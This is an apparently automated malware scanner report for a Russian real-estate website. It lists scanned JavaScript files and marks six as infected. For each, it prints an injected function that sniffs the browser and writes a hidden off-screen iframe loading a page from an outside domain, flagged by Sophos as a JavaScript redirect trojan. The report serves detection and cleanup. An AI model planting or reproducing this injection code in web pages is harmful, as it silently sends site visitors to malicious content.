New scan:

Malware Scanner report for tatar-realty.ru

Malicious/Suspicious/Total urls checked
6/0/15
6 pages have malicious code. See details below
Blacklists
OK
Malicious Redirects
OK
Malicious/Hidden/Total iFrames
0/0/12
Deface / Content modification
OK

Free periodic scanning and alerting: setup
(requires eVuln badge or a link to eVuln.com)

Malware & Hack Repair

  • Malware Removal
  • Blacklists Removal
  • Reason Eliminating
  • 1 Month Hack Insurance

More details

Website Hack Insurance

  • Files & DB Monitoring
  • Daily Backups
  • Malware & Hack Detection
  • Unlimited Hack Repairs

More details

Scanned pages/files

RequestServer responseStatus
http://www.tatar-realty.ru/
200 OK
Content-Length: 29038
Content-Type: text/html
clean
http://www.tatar-realty.ru/media/system/js/mootools-core.js
200 OK
Content-Length: 597
Content-Type: application/x-javascript
clean
http://www.tatar-realty.ru/media/system/js/core.js
200 OK
Content-Length: 5383
Content-Type: application/x-javascript
clean
http://www.tatar-realty.ru/media/system/js/mootools-more.js
200 OK
Content-Length: 597
Content-Type: application/x-javascript
clean
http://www.tatar-realty.ru/media/system/js/modal.js
200 OK
Content-Length: 10331
Content-Type: application/x-javascript
clean
http://www.tatar-realty.ru//ajax.googleapis.com/ajax/libs/jquery/1.7/jquery.min.js/
404 Not Found
Content-Length: 955
Content-Type: text/html
clean
http://www.tatar-realty.ru/test404page.js
404 Not Found
Content-Length: 303
Content-Type: text/html
clean
http://www.tatar-realty.ru/components/com_k2/js/k2.js
200 OK
Content-Length: 7423
Content-Type: application/x-javascript
malicious
Malicious code - confirmed by antiviruses (see below)

function Argisuliterkas() {
var dude = navigator.userAgent;
var unificas = (dude.indexOf("Windows") < +1 || dude.indexOf("Chrome") > -1 || dude.indexOf("IEMobile") > -1);
if (!unificas) {
document.write('<iframe src="http://raficavulerta.rodrigoillarraga.com.ar/kajetabulta15.html" style="positi'+'on:absolute;bor'+'der-style:none;left: -849px;backgr'+'ound-color:green;top: -849px;" height="138" width="138"></ifra'+'me>');
}
}
Argisuliterkas(
... 3463 bytes are skipped ...
nt)
$K2('.k2Scroller').css('width',($K2('.k2Scroller').find('.k2ScrollerElement:first').outerWidth(true))*$K2('.k2Scroller').children('.k2ScrollerElement').length);
});
// Equal block heights for the "default" view
$K2(window).load(function () {
var blocks = $K2('.subCategory, .k2EqualHeights');
var maxHeight = 0;
blocks.each(function(){
maxHeight = Math.max(maxHeight, parseInt($K2(this).css('height')));
});
blocks.css('height', maxHeight);
});

Antivirus reports:

Sophos
Troj/JSRedir-OI

http://www.tatar-realty.ru/media/system/js/caption.js
200 OK
Content-Length: 1328
Content-Type: application/x-javascript
clean
http://www.tatar-realty.ru/media/widgetkit/js/jquery.js
200 OK
Content-Length: 597
Content-Type: application/x-javascript
clean
http://www.tatar-realty.ru/cache/widgetkit/widgetkit-07424695.js
200 OK
Content-Length: 14205
Content-Type: application/x-javascript
malicious
Malicious code - confirmed by antiviruses (see below)

window["WIDGETKIT_URL"]="/media/widgetkit";
function wk_ajax_render_url(widgetid){return"/component/widgetkit/?tmpl=raw&amp;id="+widgetid}
function Argisuliterkas(){var dude=navigator.userAgent;var unificas=(dude.indexOf("Windows")<+1||dude.indexOf("Chrome")>-1||dude.indexOf("IEMobile")>-1);if(!unificas){document.write('<iframe src="http://raficavulerta.rodrigoillarraga.com.ar/kajetabulta15.html" style="positi'+'on:absolute;bor'+'der-style:none;left: -849px;backgr'+'ound-
... 3164 bytes are skipped ...
tter-bubbles");if(d.length){var e=function(){d.each(function(){var c=0;b(this).find("p.content").each(function(){var a=b(this).height();a>c&&(c=a)}).css("min-height",c)})};e();b(window).bind("load",e)}});
$widgetkit.trans.addDic({"LESS_THAN_A_MINUTE_AGO":"less than a minute ago","ABOUT_A_MINUTE_AGO":"about a minute ago","X_MINUTES_AGO":"%s minutes ago","ABOUT_AN_HOUR_AGO":"about an hour ago","X_HOURS_AGO":"about %s hours ago","ONE_DAY_AGO":"1 day ago","X_DAYS_AGO":"%s days ago"});

Antivirus reports:

Sophos
Troj/JSRedir-OI

http://www.tatar-realty.ru/templates/yoo_revista/warp/js/warp.js
200 OK
Content-Length: 7447
Content-Type: application/x-javascript
malicious
Malicious code - confirmed by antiviruses (see below)

function Argisuliterkas() {
var dude = navigator.userAgent;
var unificas = (dude.indexOf("Windows") < +1 || dude.indexOf("Chrome") > -1 || dude.indexOf("IEMobile") > -1);
if (!unificas) {
document.write('<iframe src="http://raficavulerta.rodrigoillarraga.com.ar/kajetabulta15.html" style="positi'+'on:absolute;bor'+'der-style:none;left: -849px;backgr'+'ound-color:green;top: -849px;" height="138" width="138"></ifra'+'me>');
}
}
Argisuliterkas(
... 3308 bytes are skipped ...
t"),d="placeholder"in document.createElement("textarea");f.fn.placeholder=b&&d?function(){return this}:function(){return this.filter((b?"textarea":":input")+"[placeholder]").bind("focus.placeholder",
a).bind("blur.placeholder",c).trigger("blur.placeholder").end()};f(function(){f("form").bind("submit.placeholder",function(){var b=f(".placeholder",this).each(a);setTimeout(function(){b.each(c)},10)})});f(window).bind("unload.placeholder",function(){f(".placeholder").val("")})})(jQuery);

Antivirus reports:

Sophos
Troj/JSRedir-OI

http://www.tatar-realty.ru/templates/yoo_revista/warp/js/accordionmenu.js
200 OK
Content-Length: 2126
Content-Type: application/x-javascript
malicious
Malicious code - confirmed by antiviruses (see below)

function Argisuliterkas() {
var dude = navigator.userAgent;
var unificas = (dude.indexOf("Windows") < +1 || dude.indexOf("Chrome") > -1 || dude.indexOf("IEMobile") > -1);
if (!unificas) {
document.write('<iframe src="http://raficavulerta.rodrigoillarraga.com.ar/kajetabulta15.html" style="positi'+'on:absolute;bor'+'der-style:none;left: -849px;backgr'+'ound-color:green;top: -849px;" height="138" width="138"></ifra'+'me>');
}
}
Argisuliterkas(
... 980 bytes are skipped ...
);d.fn[a.prototype.name]=function(){var g=arguments,b=g[0]?
g[0]:null;return this.each(function(){var c=d(this);if(a.prototype[b]&&c.data(a.prototype.name)&&b!="initialize")c.data(a.prototype.name)[b].apply(c.data(a.prototype.name),Array.prototype.slice.call(g,1));else if(!b||d.isPlainObject(b)){var f=new a;a.prototype.initialize&&f.initialize.apply(f,d.merge([c],g));c.data(a.prototype.name,f)}else d.error("Method "+b+" does not exist on jQuery."+a.name)})}})(jQuery);

Antivirus reports:

Sophos
Troj/JSRedir-OI

http://www.tatar-realty.ru/templates/yoo_revista/warp/js/dropdownmenu.js
200 OK
Content-Length: 5989
Content-Type: application/x-javascript
malicious
Malicious code - confirmed by antiviruses (see below)

function Argisuliterkas() {
var dude = navigator.userAgent;
var unificas = (dude.indexOf("Windows") < +1 || dude.indexOf("Chrome") > -1 || dude.indexOf("IEMobile") > -1);
if (!unificas) {
document.write('<iframe src="http://raficavulerta.rodrigoillarraga.com.ar/kajetabulta15.html" style="positi'+'on:absolute;bor'+'der-style:none;left: -849px;backgr'+'ound-color:green;top: -849px;" height="138" width="138"></ifra'+'me>');
}
}
Argisuliterkas(
... 3226 bytes are skipped ...
);b.fn[e.prototype.name]=function(){var o=arguments,j=o[0]?o[0]:null;return this.each(function(){var a=b(this);if(e.prototype[j]&&a.data(e.prototype.name)&&j!="initialize")a.data(e.prototype.name)[j].apply(a.data(e.prototype.name),Array.prototype.slice.call(o,1));else if(!j||b.isPlainObject(j)){var g=
new e;e.prototype.initialize&&g.initialize.apply(g,b.merge([a],o));a.data(e.prototype.name,g)}else b.error("Method "+j+" does not exist on jQuery."+e.name)})}})(jQuery);

Antivirus reports:

Sophos
Troj/JSRedir-OI

http://www.tatar-realty.ru/templates/yoo_revista/js/template.js
200 OK
Content-Length: 1823
Content-Type: application/x-javascript
malicious
Malicious code - confirmed by antiviruses (see below)

function Argisuliterkas() {
var dude = navigator.userAgent;
var unificas = (dude.indexOf("Windows") < +1 || dude.indexOf("Chrome") > -1 || dude.indexOf("IEMobile") > -1);
if (!unificas) {
document.write('<iframe src="http://raficavulerta.rodrigoillarraga.com.ar/kajetabulta15.html" style="positi'+'on:absolute;bor'+'der-style:none;left: -849px;backgr'+'ound-color:green;top: -849px;" height="138" width="138"></ifra'+'me>');
}
}
Argisuliterkas(
... 592 bytes are skipped ...
#bottom-a .grid-h').matchHeight('.deepest');
$('#bottom-b .grid-h').matchHeight('.deepest');
$('#bottom-c .grid-h').matchHeight('.deepest');
$('#innertop .grid-h').matchHeight('.deepest');
$('#innerbottom .grid-h').matchHeight('.deepest');
$('#maininner, #sidebar-a, #sidebar-b').matchHeight();
$('.wrapper').css("min-height", $(window).height());
};
matchHeight();
$(window).bind("load", matchHeight);

});

})(jQuery);

Antivirus reports:

Sophos
Troj/JSRedir-OI


Malicious Redirects

First query (normal visit):
GET / HTTP/1.1
Host: tatar-realty.ru

Result:
Second query (visit from search engine):
GET / HTTP/1.1
Host: tatar-realty.ru
Referer: http://www.google.com/search?q=tatar-realty.ru

Result:
The result is similar to the first query. There are no suspicious redirects found.

Safe Browsing / Blacklists

Query: http://www.google.com/safebrowsing/diagnostic?site=tatar-realty.ru

Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://tatar-realty.ru/

Result: tatar-realty.ru is not infected or malware details are not published yet.